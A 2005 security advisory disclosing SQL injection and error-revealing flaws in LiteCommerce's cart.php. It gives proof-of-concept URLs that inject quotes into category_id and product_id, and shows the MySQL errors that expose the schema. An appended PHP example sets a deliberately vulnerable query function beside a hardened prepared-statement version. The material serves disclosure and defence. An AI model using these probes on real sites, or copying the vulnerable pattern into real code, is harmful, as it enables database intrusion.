Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: LiteCommerce SQL injection and revealing errors vulnerability
Date: 07/04/2005

Vendor: LiteCommerce
Vendor Website: http://www.litecommerce.com

Summary: LiteCommerce SQL injection and revealing errors vulnerability

Proof of Concept Exploits:

PHP SCRIPT EXPOSURE
http://localhost/test/cart.php?target='PHP_SCRIPT_EXPOSURE

SQL INJECTION
http://localhost/test/cart.php?target=category&category_id='SQL_INJECTION

1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SQL_INJECTION' AND 1 ORDER BY order_by, name' at line 1 in SELECT category_id,image_width,image_height,name,description,meta_tags,enabled,views_stats,order_by,membership,threshold_bestsellers,parent,image_type FROM xlite_categories WHERE parent=''SQL_INJECTION' AND 1 ORDER BY order_by, name

This reveals column and table information, so it is very high risk and easy to exploit.

SQL INJECTION
http://localhost/test/cart.php?target=product&product_id='SQL_INJECTION&category_id=246

1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SQL_INJECTION' AND enabled=1' at line 1 in SELECT inventory_id,amount,low_avail_limit,enabled,order_by FROM xlite_inventories WHERE inventory_id=''SQL_INJECTION' AND enabled=1

Possible Fixes: The usage of htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the MySQL database, or before echoing data on the screen, would solve these problems.

Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon-to-be-released book on secure coding with PHP.
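The fix the advisory describes, as an added example that is not LiteCommerce's code: the query-building pattern that produces the category_id error above, beside a hardened version of the same lookup that validates the id as an integer, passes it as a bound parameter and keeps database errors out of the response. It uses mysqli prepared statements in place of the mysql_escape_string() escaping the advisory suggests (the mysql_* functions were later removed from PHP); table and column names are taken from the error messages above, and the mysqli connection `$db` is assumed.

```php
<?php
// Added example, not LiteCommerce code. Table/column names come from the error
// messages in the advisory; the mysqli connection ($db) is assumed to exist.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// BEFORE: the raw GET value is concatenated into the query and the MySQL error,
// including the full statement, is echoed back. A single quote in category_id
// produces exactly the 1064 output shown above.
function loadCategoryVulnerable(mysqli $db, array $get): array
{
    $sql = "SELECT category_id, name, parent FROM xlite_categories "
         . "WHERE parent='" . $get['category_id'] . "' AND 1 ORDER BY order_by, name";
    try {
        return $db->query($sql)->fetch_all(MYSQLI_ASSOC);
    } catch (mysqli_sql_exception $e) {
        echo $e->getCode() . ': ' . $e->getMessage() . ' in ' . $sql; // discloses schema
        return [];
    }
}

// AFTER: the id must be a non-negative integer, it travels as a bound parameter
// rather than as query text, and database errors are logged instead of shown.
function loadCategory(mysqli $db, array $get): array
{
    $id = filter_var($get['category_id'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 0]]);
    if ($id === false) {
        http_response_code(400);   // "'SQL_INJECTION" is rejected before any query runs
        return [];
    }
    try {
        $stmt = $db->prepare('SELECT category_id, name, parent FROM xlite_categories '
                           . 'WHERE parent = ? ORDER BY order_by, name');
        $stmt->bind_param('i', $id);
        $stmt->execute();
        return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    } catch (mysqli_sql_exception $e) {
        error_log('xlite_categories lookup failed: ' . $e->getMessage());
        http_response_code(500);   // generic failure, no query text or column names
        return [];
    }
}

// On the way out, escape before echoing, as the advisory also recommends.
function renderName(array $row): string
{
    return htmlspecialchars((string) $row['name'], ENT_QUOTES, 'UTF-8');
}
```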